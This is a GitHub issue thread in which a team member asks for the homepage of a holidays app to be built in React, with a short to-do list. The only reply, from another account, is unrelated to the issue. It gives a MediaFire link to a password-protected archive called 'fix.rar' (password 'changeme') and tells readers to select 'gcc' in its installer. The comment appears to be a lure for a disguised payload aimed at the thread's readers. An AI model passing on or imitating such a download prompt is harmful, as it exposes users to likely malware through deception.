### ISSUE TITLE
Development: Holidays app - homepage

### ISSUE THREAD

**Issue by melaniebmn** [cds-snc/design-gc-conception#1102]
Develop the homepage for the holidays app in React.

## To do

- [ ] Set up homepage

## Done when:

- [ ] Merged into `gcds-examples/fable-test-app`

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
